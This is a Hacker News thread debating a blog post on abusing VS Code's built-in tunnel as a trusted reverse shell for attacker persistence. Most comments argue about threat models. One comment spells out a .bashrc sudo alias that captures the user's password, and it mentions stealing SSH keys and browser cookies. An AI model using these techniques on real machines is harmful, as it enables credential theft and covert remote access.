Hacker News new | past | comments | ask | show | jobs | submit login
Blocking Visual Studio Code embedded reverse shell before it's too late (ipfyx.fr)
310 points by GavinAnderegg on Sept 23, 2023 | hide | past | favorite | 83 comments



> this tunnel can be triggered from the cmdline with the portable version of code.exe. An attacker just has to upload the binary

If the attacker can run commands and upload binaries, it really doesn't matter what VS Code does. There are lots of commands and binaries that can open network connections.

Edit: The attacker apparently needs to control the URL and exfiltrate the activation code [0], so if they can already execute commands and open network connections, then this enables them to execute commands and open network connections. So, as mentioned by other commenters, this does sound a lot like Raymond Chen's airtight hatchway [1].

[0] https://badoption.eu/blog/2023/01/31/code_c2.html

[1] https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31...


I think there is a difference in degree.

There is some likelihood that VS Code may already be installed (depending on who the attacker wants to target), so the victim "just" has to be tricked to run a single shell command - and the attacker immediately gets live shell access, without having to worry about firewalls, connectivity, finding the victim's address, etc.

So I think the danger of this is less that it's technically an RCE exploit (as indeed you already need an existing way to run code to trigger it) - but rather that it lets an attacker turn a relatively simple capability (planting a single shell command with no back channel that the victim might run at some point in the future) into a sophisticated one (having access to a full remote shell with all bells and whistles, including firewall traversal, automatic reconnect and file transfer).

Edit: ok, looks like the attacker already needs a back channel to get hold of the access code for the tunnel.


You've misunderstood the situation completely. The first job of a persistent attacker is to gain acceess. The second job of a persistent attacker is to pivot that access from illegitimate to legitimate, so that by the time their TTPs become IOCs, log rotation has wiped that illegitimate access from the books and all their access looks legitimate.

What we have here is a way for an attacker using shady means (email-delivered 0day, parking lot thumbdrive, browser drive-by compromise) to take over a computer and then drop a signed package that will allow for remote control over time that looks completely legitimate. To a network IDS, that access will look like an authorized cloud tunnel, completely normal. To a file scanner, it will look like an vendor-signed binary, the gold standard. To the complete defense-in-depth stack, the entire c2 chain is cloaked in legitimacy. If you get a single detection at all for the initial compromise (not possible with 0day), the entire rest of the kill chain looks like legitimate access and vanishes.

It's a nightmare for defense in depth and hunt teams.


Thanks for the explanation, that makes a lot more sense actually.


ssh.exe seems to be on enough Windows machines these days. How's that different?


ssh.exe would at least show up on the firewall as "ssh connecting to a dubious host". The VSCode thing would show up as "VSCode connecting to some random Microsoft domain".


Yeah, sorry but if you are in an environment were you are actively monitoring your firewall and you didn't get that your machine was breached you have way other problems than vscode or an SSH process.


How do you get that your machine(or one of the many you are observing) was breached, if the attacker is not doing obvious damage? I think monitoring connections is standard procedure to find this out?


If someone can access your machines physically, can login, play with an USB Stick or download malware. No form of monitoring your logs will keep your data safe.


The question is not to keep your data safe, but to know that there is a breach to begin with.


If a user is logged in with high activity at a time the user should not be working and the only thing that would tick you off is your firewall log you got other problems than a remote access feature of vscode that "could" be abused ONLY if the attacker had previously breached your system.


And if the attacker is smart and uses active times to hide his activity, then monitoring active connections is a smart way, no?


It's nice to have especially if you need to find a rogue employee but if you catch a bad actor only when he is already exfiltrating, you failed at your job.


Sure, but when some damage is already done, you can and must still prevent greater damage. And you have to assume, that one day something fails. So - "monitoring active connections is a smart way, no?"


powershell.exe is on all of them. Just load up System.Net.TcpListener/Client and bob’s your uncle.


Running arbitrary Powershell scripts from disk during OS autostart is one of the (if not the) loudest things attacker could do. The point of this blog post is stealth. Nobody claims it's a vulnerability in VS code (or vulnerability in anything at all), just a convenient method of persistence.


And then for the attacker to do anything damaging to the computer they need to trick you into revealing your sudo/admin password, right?

On a default Unix-like desktop shell you can’t really do much permanent harm without elevating your permissions.


Write access to .bashrc is plenty to very sneakily get sudo access tho.

  alias sudo='./.my-evil-sudo-binary'
And wait till the next time the user authenticates, they wont see anything amiss and you just silently delete the alias after you’ve got the sudo password.

Also even without root dumping .ssh and the browser’s cookie jar is probably plenty to achieve lateral movement and you don’t need root for that.


Indeed. This whole post is a nothingburger since the "attack" requires the attacker to already be on the wrong side of the airtight hatchway.


The "airtight hatchway" argument is that it's not a security bug in the program. I don't think TFA makes the case that it is a security bug, so it's moot.

Personally I'm not particularly moved by the lolbin and footgun case it does make. I am just mildly put off by how text editors and IDEs are inextricably bundled with so many double-edged remote capabilities.


This. I'd be more worried some worker opens up a piece of internal infrastructure deliberately to make their work life easier instead of an attacker taking advantage of the binary being trusted.


They are nowadays competing with cloud services for users. Increasingly, being able to manipulate data on a machine other than the one I'm currently physically sitting at is table stakes features.


Isn't the whole "airtight hatchway" concept mostly invalidated today by "defense in depth" an "zero-trust networking" paradigms? Effectively, the airtight hatchway often isn't, so you do have to think about cases where the attacker is behind it.

E.g., it used to be an effective security measure to have a daemon listen on loopback only. But then browsers relaxed the same-origin policy and today every sleazy banner ad can get the browser to open a TCP connection on loopback and at least send a TLS handshake - and, if the daemon accepts that, an OPTIONS request with an attacker-controlled URL. So a daemon has to perform at least some basic validation on incoming connections to be secure.


Zero-trust networking still involves threat models and things which you are and aren't trying to defend against. The "airtight hatchway" concept is just that once you've declared that a certain type of attack isn't something you're trying to prevent, there's no point in reporting issues which rely on that attack because it's already known to be vulnerable. Defense in depth can be seen as adding multiple hatchways, but there's still always going to be something inside the innermost one.

If your threat model involves people trying to exfiltrate data from a developer machine with an internet connection in an innocent-looking way, this VSC feature is a problem. Most companies either don't make an attempt at preventing that, or would use an airgapped setup so it's not something worth caring about.


> Defense in depth can be seen as adding multiple hatchways, but there's still always going to be something inside the innermost one.

And even if you're not in the innermost area, an attack might exist entirely in the space between two hatchways and not breach any.


Isn't this validly described as "it lets you execute commands as a particular user on a particular host, but requires you to first execute a command as that user on that host"? Even in "defense in depth" or "zero-trust networking" paradigms, what does this ever let attackers do that they couldn't do already?


Unfortunately, differentiating good behavior from malicious behavior is a central pillar of security, and the existence of this feature undermines that pillar.

* The fact that it's in a popular signed binary means it bypasses app allow-lists.

* The fact that it flows through Microsoft's servers bypasses firewall allow-lists.

* The fact that no stage2 is required bypasses antivirus scanning.

I say "unfortunately" because I personally think attempting to differentiate good behavior from malicious behavior is losing battle. Design-based or resilience-based security controls are the way to go IMO: https://kellyshortridge.com/blog/posts/control-vs-resilience...


Looking at it from a risk management perspective there’s more nuance.

There’s lots of ways to tunnel, but a methodology that looks and may be legit is a great one. This a great way to have a long term, persistent exfiltration mechanism. Compromise some desktops, move laterally through the network and you have a river of data flowing out.


Here's the "airtight hatch" article folks are referring to:

https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31...

Phishing does involve an insider being confused and letting someone in, though. The question is what a vscode user could be tricked into doing. That part of the explanation could be fleshed out more?

I'm also reminded of how browsers do defense in depth. The "airtight hatch" argument implies that second-level security is worthless because the first level is secure. Having a useful binary already there on the system might be useful for chaining with another exploit?

But that assumes a developer environment can be made into a low-privilege container, sort of like a browser's render process. I don't think many people work that way?

Perhaps someday we will work in containers and code editors will be locked down like browsers. The most straightforward path to that would probably be for the code editor to run in the browser.

That's something VS Code can do, so a policy that says you must use a browser-based version of VS Code might actually work for some organizations?


The "airtight hatch" story is not fully applicable here. Executing VScode instead of a random exploit payload could be considered an increase in privilege, because you're going from an unsigned and unknown binary to one that is signed by Microsoft. And VScode is probably allowed through any outgoing firewall rules because the main user of the machine is using it, while a random exploit payload would not be.


The vast vast majority of users will neither want nor use this embedded reverse shell functionality. I fall in that majority. Hats off to the users who do to get their work done with it but I/we don't.

So for us, this function should have an enable flag which is off by default. The slim minority who do want it and would use it can suffer the inordinate burden of having to go into the preferences panel and clicking enable.

You can argue whether it is a hole (it is) or whether it is a piece of a hole (it is). But it should be off by default and on by permission.

Yo Microsoft, add a preference for this thing which defaults off.


It is not enabled by default? You need to log in with a GitHub or Microsoft account, install the remote dev extension, and then explicitly enable the feature on a per-machine basis (and yes, this can be done via the CLI, as the article mentions).

If you don’t know the feature set of the software you use, maybe don’t use the software instead of blaming the vendor.


1. You don’t need to install any extension, `code tunnel` is builtin, the extension is UI stuff using the tunnel. No need for any extension to open a reverse shell.

2. It’s about an attacker exploiting the feature, the attacker is enabling it and doing the login. Whether you need to enable it yourself is largely irrelevant, in fact you’re probably more likely to notice an ongoing attack if you use the feature yourself.

Anyway, default is pointless, a gadget is a gadget as long as the bits are there and easily executable.


But I don't want to know this feature in order to use this editor. Apparently Auto Closing Overtype deserves an enable/disable/auto flag but Embedded Reverse Shell doesn't.

Yo Microsoft, add a preference for this thing which defaults off.


> If you don’t know the feature set of the software you use, maybe don’t use the software instead of blaming the vendor.

Saying this in reference to modern Microsoft, with their default-opt-in-to-drive-market-share strategy, is a pretty high bar.

Effectively it means "Don't use Windows."


So if someone already has physical access to a machine they can get remote access to the machine? Even ignoring the fact that they already had access, they sell devices that emulate a keyboard/mouse/monitor that can already do this undetectably.


I think there’s an interesting argument to be made about reducing the attack surface area for userspace though. A really naive thing to do would be to run any shell (any program really) in its own isolated environment. The barriers to this aren’t really technical IMO, mostly they are UX barriers. It needs good OS support, and there’s not really a developer oriented OS with smooth mechanisms for escalating and de-escalating privileges at a granular level (sudo ain’t it lol).

An ideal development environment would: (1) allow for executing unsigned/self-signed code without jumping through hoops or relying on a 3rd party or App Store, (2) allow for escalation and automatic descalation of fine-grained privileges with native UX for grants (LittleSnitch on macOS has a good design for this specifically for networking IMO —- one could imagine extending this to the file system).

There are plenty of systems that have some aspects of these, but I have not seen both, at least not in a form accessible enough to be ubiquitous in 2023.


Or someone with physical access for five minutes can set themselves with a lifetime subscription to whatever you may have thats worth stealing on that machine in the future, without installing anything that can be detected as malware.


Code execution leads to code execution. CVE score 9.98 confirmed by Mitre


> The worse part is that this tunnel can be triggered from the cmdline with the portable version of code.exe. An attacker just has to upload the binary, which won't be detected by any anti-virus since it is legitimate and singed windows binary.

This feels like Raymond Chen’s other side of the airtight hatch.

Yes, if you can get a binary you control onto the user’s system and get them to run it, you can use that to have remote code execution. But then, the whole exploit described is remote code execution.


Vs code functions as a remote access trojan (RAT) in this scenario. But while your AV will hopefully detect and flag most common RATs, it won't flag vs code. This method is often used in real world attacks (especially targetted ones).

I'm not saying that's a huge concern, but something one has to consider when protecting their organisation.


But how did you put the binary on the box and run it without an already working RCE/RAT?


I think it's a point about persistence. It's easy to obfuscate an existing piece of malware to not be found for a day or two, harder to keep it undetected forever. If you instead task schedule code.exe to expose some internal network port, you can keep it for as long as the machine lives.

But that's already assuming you get compromised anyway, and that your compromised workstations have things worth reaching on their internal network/VPN. All things that are true on real corporate networks, but "fixing" this vulnerability is still pretty low impact in the grand scheme of things one could do to to improve the situation. But in my experience, most CISOs aren't that great at setting priorities and threat modeling anyway: One just recently told me they doesn't want XSS vulnerabilities reported, because the scanner would find them anyway - but sends out daily all-caps emails about specific emails being phishing.


The industry is pretty bad at blocking RCEs (0-day is just inevitable, but preventing 1-day or just stolen credentials is IMO equally hard). The industry is better at detecting compromise by spotting post-exploitation behaviors such as reverse shells or exfiltrating large amount of data.

Your developer uses VSCode and sends a lot of data to vscode.dev or another Microsoft domain? Sounds totally normal, nothing suspicious here, move on!


> internal network is now accessible from anywhere !

If you exposed it willingly.


The point of the blog post is that this method is useful for attackers (as a so-called lolbin - trusted binary used in a malicious way).


I work with 500 idiots. Willingly and cluelessly are interchangeable.


Not nicely put, but not wrong. I had half an heart attack when that feature was rolled out, and the danger was split only between myself and a colleague. I can't even trust myself to not screw up. I needed another permanencied invocation of the principle of hope.


The industry is only going to keep making more idiots if they treat developers like this.


It kept producing more idiots when we didn't treat them like this and this is easier so fuck it.


Take their computer away.


Seems to be the goal of most "cybersecurity" types.


I thought their goal was collecting vendor certifications.


Ouch dude


It's a burn but it's accurate. Had three consultancies in (high end well known ones) and and two in house certified to their eyeballs professional cyber security experts in charge. All they did was tick a fuck load of boxes, run some scans, spend a lot of money and make it really hard for people.

Yet I managed to find a fully remote RCE and exploit it in 30 minutes after they did all this.

The industry is a fucking scam.


Confirming this experience, it is Security Theatre all the way down.


Sounds like it's time to make your own certification. :D


Management frowned at this suggestion.


Well said, this is why working solo can be beneficial: only one idiot to look out for. :)


That’s the idiot that can do the most damage!


Can confirm.


This can be particularly pernicious since in order to collaborate, someone may do this and not consider the security ramifications


If I enter your house through the front door and unlatch the patio door from the inside, I can then enter the house through the patio door


I am so glad that my users now have the ability to expose their computer with highly sensitive data right on the web, through an authentication I nor control, nor supervise.

Perhaps you shouldn't treat your users like stupid cattle, or you're not going to get anything better but only worse.


It's about preventing mistakes and everybody makes those. If your company or institution is a target for spies, you want to avoid anything that makes it easy for an attacker.


You know, sometimes people cut themselves very badly with sharp knives.

I'd like you to give me all your kitchen knives. If you need to cook a steak or something, you can just give me a call and I will supervise you while you use the knife.

I wouldn't want you to make a mistake and make it too easy to injure yourself.


In medicine, this is called an autoimmune disease. In social sciences, this is called paranoia. The latter is about about as helpful to an organization as the former is to a human body.


The is the obvious next step for the industry/technology. I think a better answer is to maximally reduce the potential fallout from a compromised employee.

This is easier said then done and if you go the direction of complicated procedures employees will usually just try to bypass procedures entirely.

However I think there is a middle ground or a sweet spot here. The tech has come a long way in the past decade or so. Its pretty easy to have a set up where almost no employee can deploy to production from their local machine.

Its also the easiest its ever been to have a sandboxed production environment and a near parallel staging environment.


Stepping back for a second...do we have evidence that these sorts of issues are actually the cause of a significant number of breaches rather than paranoia on the part of people that are paid to be paranoid?

That's not a rhetorical question, I 'm actually curious to find out. The reason I ask is that of all the big security breaches that end up in the news, I cannot recall a single case where these sorts of issues (for instance, not locking down deployment to production) was the root cause.


is this already blocked by default in most corporate environments?

it seems this opens up a easy way to exfilarate corporate data (without detection?)

correct me if I am wrong please

attacker (or a cooperating employee) can browse and download any files from target machine inside corporate network by opening the generated vscode.dev/tunnel URL from a browser on any device anywhere in the world ?


Yep. A place I worked forked VSCode as it's recommended IDE. VSCode can prevent installation of all but allowlisted extensions by policy. They used an extensive review process for third-party extensions because some components are necessary to run remotely in the development environment instead of on the local machine with the VSCode UI.

Random thought: Since there are N editors and M languages, that's N x M plugins. Surely there's a better way to reduce the effort involved.


> Random thought: Since there are N editors and M languages, that's N x M plugins. Surely there's a better way to reduce the effort involved.

Yeah, it’s called LSP. The core of most plugins is just an lsp that’s shared between vim, neovim, emacs, vscode, sublime, etc. all the editor needs is to support generic lsp, or have a generic lsp plugin like vim/emacs.

For example if you look at neovim, you just load the actual lsp and wire it up to the editor in lua. That’s more or less the majority of the “extension code” for something like sublime or vscode (plus some other niceties)


You're making a dishonest leap here. Language server protocol doesn't create a universal plugin.


What do you mean by a universal plugin?


LSP doesn't automatically add all possible language support features to all editors using a common API without any extra effort. It gives things like code completion, syntax, and refactoring help, but these are only some of the pieces of language support that each editor must provide rather than a complete solution.


> VSCode can prevent installation of all but allowlisted extensions by policy.

Companies using that are probably the reason for, or at least a big motivator for, the feature in question. Lots of developer creativity is spent on working around corporate "security" practices that otherwise prevent work from being done.


How well would it work to allow every plugin to be used on confidential systems and protected without any sort of review? There's no way to denylist the way out of preventing a keylogger or malicious look-alike plugin retroactively. I think you're painting with a broad brush lacking nuance or understanding the concerns involved.


I'm painting with a broad brush indeed, as all my nuance has been lost dealing with bullshit like being able to 5x my coding speed by (ab)using my "local admin" rights to discover which magic folders are on the Windows Defender exclusions list, hardcoded by corporate policy, and moving all my stuff there, while seeing requests to kindly just allow us to add our stuff to exclusions locally rejected with responses like "nope, and surely we can resolve the slowdown this causes by reimbursing you for a cooling pad for your laptop".


Well, that's all well-and-good. You have to deal with the possible and the permitted rather than than complain about how you would do things your way. It's not your company and not your risk. Any time you break legitimate security rules you're putting your job and the jobs of everyone else at risk should there be a massive breach.

No one in corporate uses WD because it's unmanaged. OTOH, MDE P1+VM is a steaming pile of shit that arbitrarily deletes things on untold millions of end-user devices because of the way Microsoft doesn't do properly risk management (canary) for new definitions.


why is this not an extension?

I cannot think of a single argument for this being default functionality.


Is this more or less of a vulnerability than VS Code's Live Share? https://code.visualstudio.com/learn/collaboration/live-share


No, it's an intentional ngrok-like tunneling feature.


This very poorly written




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: